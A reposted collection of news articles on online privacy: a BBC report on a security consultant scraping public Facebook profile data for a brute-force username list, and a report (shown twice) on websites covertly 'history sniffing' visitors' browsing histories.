Facebook - Not So Private!

By Daniel Emery Technology reporter, BBC News



(CANADA) The man who harvested and published the personal details of 100m Facebook users has spoken out about his motives.



Ron Bowes, a Canadian security consultant, used a piece of code to scan Facebook profiles, collecting data not hidden by users' privacy settings.



The list, which contains the URL of every searchable Facebook user's profile, name and unique ID, has been shared as a downloadable file.



Mr Bowes told BBC News that he did it as part of his work on a security tool.



"I'm a developer for the Nmap Security Scanner and one of our recent tools is called Ncrack," he said. "It is designed to test password policies of organisations by using brute force attacks; in other words, guessing every username and password combination."



By downloading the data from Facebook, and compiling a user's first initial and surname, he was able to make a list of the most common probable usernames to use in the tool.



The three most common names, he found, were jsmith, ssmith and skhan.



In theory, researchers could then combine this list with a catalogue of the most commonly used passwords to test the security of sites. Similar techniques could be used by criminals for more nefarious means.



Mr Bowes said his original plan was to "collect a good list of human names that could be used for these tests".



"Once I had the data, though, I realised that it could be of interest to the community if I released it, so I did," he added. I am of the belief that, if I can do something then there are about 1,000 bad guys that can do it too”



Mr Bowes confirmed that all the data he harvested was already publicly available but acknowledged that if anyone now changed their privacy settings, their information would still be accessible.



"If 100,000 Facebook users decide that they no longer want to be in Facebook's directory, I would still have their name and URL but it would no longer, technically, be public," he said.



Mr Bowes said that collecting the data was in no way irresponsible and likened it to a telephone directory.



"All I've done is compile public information into a nice format for statistical analysis," he said



Simon Davies from the watchdog Privacy International told BBC News it was an "ethical attack" and that more personal information had not been included in the trawl.



"This is a reputational and business issue for Facebook, for now," he said



"They can continue to ride the risk and hope nothing cataclysmic occurs, but I would argue that Facebook has a special responsibility to go beyond doing the bare minimum," he added.



Snowball effect

Mr Bowes' file has spread rapidly across the net.



On the Pirate Bay, the world's biggest file-sharing website, the list was being distributed and downloaded by thousands of users.



One user said that the list showed "why people need to read the privacy agreements and everything they click through".



In a statement to BBC News, Facebook confirmed that the information in the list was already freely available online.



"No private data is available or has been compromised," the statement added.



That view is shared by Mr Bowes, who added that harvesting this data highlighted the possible risks users put themselves in.



"I am of the belief that, if I can do something then there are about 1,000 bad guys that can do it too.



"For that reason, I believe in open disclosure of issues like this, especially when there's minimal potential for anybody to get hurt.



"Since this is already public information, I see very little harm in disclosing it."



Digital trends

However, he said, it also highlighted a new trend that was emerging in the digital age.



"With traditional paper media, it wasn't possible to compile 170 million records in a searchable format and distribute it, but now we can," he said.



"Having the name of one person means nothing, and having the name of a hundred people means nothing; it isn't statistically significant.



"But when you start scaling to 170 million, statistical data emerges that we have never seen in the past."



A spokesperson for Facebook said the list was "similar to the white pages of the phone book.



"This is the information available to enable people to find each other, which is the reason people join Facebook."



"If someone does not want to be found, we also offer a number of controls to enable people not to appear in search on Facebook, in search engines, or share any information with applications."



Earlier this year there was a storm of protest from users of the site over the complexity of Facebook's privacy settings. As a result, the site rolled out simplified privacy controls.



Facebook has a default setting for privacy that makes some user information publicly available. People have to make a conscious choice to opt-out of the defaults.





original article here

Browser Flaw Can Pick Up Your Porn Site Visits

Dozens of websites have been secretly harvesting lists of places that their users previously visited online, everything from news articles to bank sites to pornography, a team of computer scientists found.

The information is valuable for con artists to learn more about their targets and send them personalized attacks. It also allows e-commerce companies to adjust ads or prices — for instance, if the site knows you've just come from a competitor that is offering a lower price.

Although passwords aren't at risk, in harvesting a detailed list of where you've been online, sites can create thorough profiles on its users.

The technique the University of California, San Diego researchers investigated is called "history sniffing" and is a result of the way browsers interact with websites and record where they've been. A few lines of programming code are all a site needs to pull it off.

Although security experts have known for nearly a decade that such snooping is possible, the latest findings offer some of the first public evidence of sites exploiting the problem. Current versions of the Firefox and Internet Explorer browsers still allow this, as do older versions of Chrome and Safari, the researchers said.

The report adds to growing worry about surreptitious surveillance by Internet companies and comes as federal regulators in the U.S. are proposing a "Do Not Track" tool that would prevent advertisers from following consumers around online to sell them more products.

The researchers found 46 sites, ranging from smutty to staid, that tried to pry loose their visitors browsing histories using this technique, sometimes with homegrown tracking code. Nearly half of the 46 sites, including financial research site Morningstar.com and news site Newsmax.com, used an ad-targeting company, Interclick, which says its code was responsible for the tracking.

Interclick said the tracking was part of an eight-month experiment that the sites weren't aware of. The New York company said it stopped using the technique in October because it wasn't successful in helping match advertisers to groups of Internet users. Interclick emphasized that it didn't store the browser histories.

Morningstar said it ended its relationship with Interclick when it found out about the program, and NewsMax said it didn't know that history sniffing had been used on its users until AP called. NewsMax said it is investigating.

The researchers studied far more sites — a total of the world's 50,000 most popular sites — and said many more behaved suspiciously, but couldn't be proven to use history sniffing. Nearly 500 of the sites studied had characteristics that suggested they could infer browsers' histories, and more than 60 transferred browser histories to the network. But the researchers said they could only prove that 46 had done actual "history hijacking."

"Browser vendors should have fixed this a long time ago," said Jeremiah Grossman, an Internet security expert at WhiteHat Security Inc., which wasn't involved in the study. "It's more evidence that we not only needed the fix, but that people really should upgrade their browsers. Most people wouldn't know this is possible."

The latest versions of Google Inc.'s Chrome and Apple Inc.'s Safari have automatic protections for this kind of snooping, researchers said. Mozilla Corp. said the next version of Firefox will have the same feature, adding that a workaround exists for some older versions as well.

Microsoft Corp. noted that Internet Explorer users can enable a private browsing mode that prevents the browser from logging the user's history, which prevents this kind of spying. But private browsing also strips away important benefits of the browser knowing its own history, such as displaying Google links you've visited in different colors than those you haven't.

"It's surprising, the lifetime that this fundamental a privacy violation can stick around," said Hovav Shacham, an assistant professor of computer science and engineering at UC San Diego and one of the paper's authors.

Internet companies are obsessed with tracking users' behavior so they can target their ads better. Uproar has prompted the Federal Trade Commission to propose rules that would limit advertisers' ability to track Internet users to show them advertisements. The "Do Not Track" tool the commission is proposing could eventually take the form of a browser setting that tells advertisers which visitors are off limits; such a setting, though, wouldn't necessarily block history sniffing.

History sniffing is essentially a side-by-side comparison of Web pages you've already visited with Web pages that a particular site wants to see if you've visited. If there's a match, users likely would never know, but the site administrators would learn a lot about their audiences.

For instance, a popular porn site was checking its visitors' histories to see if they'd visited 23 other pornography sites, and the code used on the Morningstar and NewsMax.com sites looked for matches against 48 specific Web pages, all related to Ford automobiles.

Sites can carry on this kind of inspection very quickly. Grossman said modern programs can check as many as 20,000 Internet addresses per second.

original article here

Browser Flaw Can Pick Up Your Porn Site Visits

Dozens of websites have been secretly harvesting lists of places that their users previously visited online, everything from news articles to bank sites to pornography, a team of computer scientists found.

The information is valuable for con artists to learn more about their targets and send them personalized attacks. It also allows e-commerce companies to adjust ads or prices — for instance, if the site knows you've just come from a competitor that is offering a lower price.

Although passwords aren't at risk, in harvesting a detailed list of where you've been online, sites can create thorough profiles on its users.

The technique the University of California, San Diego researchers investigated is called "history sniffing" and is a result of the way browsers interact with websites and record where they've been. A few lines of programming code are all a site needs to pull it off.

Although security experts have known for nearly a decade that such snooping is possible, the latest findings offer some of the first public evidence of sites exploiting the problem. Current versions of the Firefox and Internet Explorer browsers still allow this, as do older versions of Chrome and Safari, the researchers said.

The report adds to growing worry about surreptitious surveillance by Internet companies and comes as federal regulators in the U.S. are proposing a "Do Not Track" tool that would prevent advertisers from following consumers around online to sell them more products.

The researchers found 46 sites, ranging from smutty to staid, that tried to pry loose their visitors browsing histories using this technique, sometimes with homegrown tracking code. Nearly half of the 46 sites, including financial research site Morningstar.com and news site Newsmax.com, used an ad-targeting company, Interclick, which says its code was responsible for the tracking.

Interclick said the tracking was part of an eight-month experiment that the sites weren't aware of. The New York company said it stopped using the technique in October because it wasn't successful in helping match advertisers to groups of Internet users. Interclick emphasized that it didn't store the browser histories.

Morningstar said it ended its relationship with Interclick when it found out about the program, and NewsMax said it didn't know that history sniffing had been used on its users until AP called. NewsMax said it is investigating.

The researchers studied far more sites — a total of the world's 50,000 most popular sites — and said many more behaved suspiciously, but couldn't be proven to use history sniffing. Nearly 500 of the sites studied had characteristics that suggested they could infer browsers' histories, and more than 60 transferred browser histories to the network. But the researchers said they could only prove that 46 had done actual "history hijacking."

"Browser vendors should have fixed this a long time ago," said Jeremiah Grossman, an Internet security expert at WhiteHat Security Inc., which wasn't involved in the study. "It's more evidence that we not only needed the fix, but that people really should upgrade their browsers. Most people wouldn't know this is possible."

The latest versions of Google Inc.'s Chrome and Apple Inc.'s Safari have automatic protections for this kind of snooping, researchers said. Mozilla Corp. said the next version of Firefox will have the same feature, adding that a workaround exists for some older versions as well.

Microsoft Corp. noted that Internet Explorer users can enable a private browsing mode that prevents the browser from logging the user's history, which prevents this kind of spying. But private browsing also strips away important benefits of the browser knowing its own history, such as displaying Google links you've visited in different colors than those you haven't.

"It's surprising, the lifetime that this fundamental a privacy violation can stick around," said Hovav Shacham, an assistant professor of computer science and engineering at UC San Diego and one of the paper's authors.

Internet companies are obsessed with tracking users' behavior so they can target their ads better. Uproar has prompted the Federal Trade Commission to propose rules that would limit advertisers' ability to track Internet users to show them advertisements. The "Do Not Track" tool the commission is proposing could eventually take the form of a browser setting that tells advertisers which visitors are off limits; such a setting, though, wouldn't necessarily block history sniffing.

History sniffing is essentially a side-by-side comparison of Web pages you've already visited with Web pages that a particular site wants to see if you've visited. If there's a match, users likely would never know, but the site administrators would learn a lot about their audiences.

For instance, a popular porn site was checking its visitors' histories to see if they'd visited 23 other pornography sites, and the code used on the Morningstar and NewsMax.com sites looked for matches against 48 specific Web pages, all related to Ford automobiles.

Sites can carry on this kind of inspection very quickly. Grossman said modern programs can check as many as 20,000 Internet addresses per second.

original article here